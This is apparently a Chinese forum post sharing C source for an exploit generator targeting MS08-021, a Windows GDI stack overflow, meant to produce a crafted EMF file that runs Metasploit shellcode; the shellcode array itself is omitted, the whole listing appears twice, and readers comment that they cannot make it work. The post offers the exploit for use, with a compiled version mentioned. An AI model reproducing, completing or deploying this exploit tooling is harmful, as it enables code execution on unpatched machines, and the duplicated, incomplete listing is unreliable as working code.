PS:很好很强大..下面附了编译好的exp ··

///Exploit the MS08-021 : Stack Overflow on GDI API
///Author: Lamhtz
///Date: April 14th, 2008
///Usage: <appname.exe> [filename]
///Function: Generate a crafted emf file which could
/// automatically run calc.exe in Win2kSP4 CHS Version
/// with MS07-046 patched but MS08-021 not installed.
/// In Windows XP SP2, explorer.exe will crash but
/// calc will not be run.
/////////////////////////////////////////////////////////////
#include "stdlib.h"
/////////////////////////////////////////////////////////////
///The raw EMF data.
///Shellcode included.(Metasploit)
/////////////////////////////////////////////////////////////
//The shellcode in the middle is too long, so it is omitted here (the `data` array definition is not shown) //T4nk upx.com.cn
/////////////////////////////////////////////////////////////
///The main function to generate the EMF file
/////////////////////////////////////////////////////////////
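/*
 * Entry point: writes the embedded byte array `data` to the file named by
 * the single command-line argument.
 *
 * `data` is not defined in this listing (the page states that the raw EMF
 * bytes were omitted), so only the file-writing step is shown here.
 *
 * Returns 0 on success. Exits with 0 after printing the usage line when the
 * argument count is wrong, and with -1 when the file cannot be opened,
 * completely written, or closed.
 *
 * NOTE(review): argv is _TCHAR*, while printf("%s") and fopen_s take char*;
 * these only agree in a non-Unicode build -- confirm the project settings.
 */
int _tmain(int argc, _TCHAR* argv[])
{
    printf("/////////////////////////////////////////////////////////////\n"
           "///Exploit the MS08-021 : Stack Overflow on GDI API\n"
           "///Author: Lamhtz\n"
           "///Date: April 14th, 2008\n"
           "///Usage: <appname.exe> [filename]\n"
           "///Your filename must end with .emf\n"
           "/////////////////////////////////////////////////////////\n");

    if (argc != 2)
    {
        printf("Usage: <appname.exe> [filename]\n");
        exit(0);
    }

    FILE *stream = NULL;
    if (fopen_s(&stream, argv[1], "w+b") != 0)
    {
        printf("File Created Failure ! \n");
        exit(-1);
    }

    printf("Generating %s....\n", argv[1]);

    /* fwrite reports the number of complete items written; with a count of
     * 1, any other result means the file is truncated. */
    size_t written = fwrite(data, sizeof(data), 1, stream);

    /* fclose flushes buffered output, so a failure here also means the file
     * on disk is incomplete. */
    int close_failed = fclose(stream);

    if (written != 1 || close_failed != 0)
    {
        /* Do not claim success for a partial file. */
        printf("File Created Failure ! \n");
        exit(-1);
    }

    printf("%s created ! \n", argv[1]);
    return 0;
}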
///Author: Lamhtz
///Date: April 14th, 2008
///Usage: <appname.exe> [filename]
///Function: Generate a crafted emf file which could
/// automatically run calc.exe in Win2kSP4 CHS Version
/// with MS07-046 patched but MS08-021 not installed.
/// In Windows XP SP2, explorer.exe will crash but
/// calc will not be run.
/////////////////////////////////////////////////////////////
#include "stdlib.h"
/////////////////////////////////////////////////////////////
///The raw EMF data.
///Shellcode included.(Metasploit)
/////////////////////////////////////////////////////////////
//The shellcode in the middle is too long, so it is omitted here (the `data` array definition is not shown) //T4nk upx.com.cn
/////////////////////////////////////////////////////////////
///The main function to generate the EMF file
/////////////////////////////////////////////////////////////
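/*
 * Entry point: writes the embedded byte array `data` to the file named by
 * the single command-line argument.
 *
 * `data` is not defined in this listing (the page states that the raw EMF
 * bytes were omitted), so only the file-writing step is shown here.
 *
 * Returns 0 on success. Exits with 0 after printing the usage line when the
 * argument count is wrong, and with -1 when the file cannot be opened,
 * completely written, or closed.
 *
 * NOTE(review): argv is _TCHAR*, while printf("%s") and fopen_s take char*;
 * these only agree in a non-Unicode build -- confirm the project settings.
 */
int _tmain(int argc, _TCHAR* argv[])
{
    printf("/////////////////////////////////////////////////////////////\n"
           "///Exploit the MS08-021 : Stack Overflow on GDI API\n"
           "///Author: Lamhtz\n"
           "///Date: April 14th, 2008\n"
           "///Usage: <appname.exe> [filename]\n"
           "///Your filename must end with .emf\n"
           "/////////////////////////////////////////////////////////\n");

    if (argc != 2)
    {
        printf("Usage: <appname.exe> [filename]\n");
        exit(0);
    }

    FILE *stream = NULL;
    if (fopen_s(&stream, argv[1], "w+b") != 0)
    {
        printf("File Created Failure ! \n");
        exit(-1);
    }

    printf("Generating %s....\n", argv[1]);

    /* fwrite reports the number of complete items written; with a count of
     * 1, any other result means the file is truncated. */
    size_t written = fwrite(data, sizeof(data), 1, stream);

    /* fclose flushes buffered output, so a failure here also means the file
     * on disk is incomplete. */
    int close_failed = fclose(stream);

    if (written != 1 || close_failed != 0)
    {
        /* Do not claim success for a partial file. */
        printf("File Created Failure ! \n");
        exit(-1);
    }

    printf("%s created ! \n", argv[1]);
    return 0;
}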

yifan

April 21, 2008 09:18
问一个比较傻的问题啊!有了shellcode 用什么工具编译啊!

zaroty

April 17, 2008 13:00
貌似我比较傻啊。。给了源码和Exploit 都不知道怎么用。。。我只能生成一个emf文件。。并且没有效果,
zaroty

April 17, 2008 12:54
Overflow...偶没看到效果啊、、

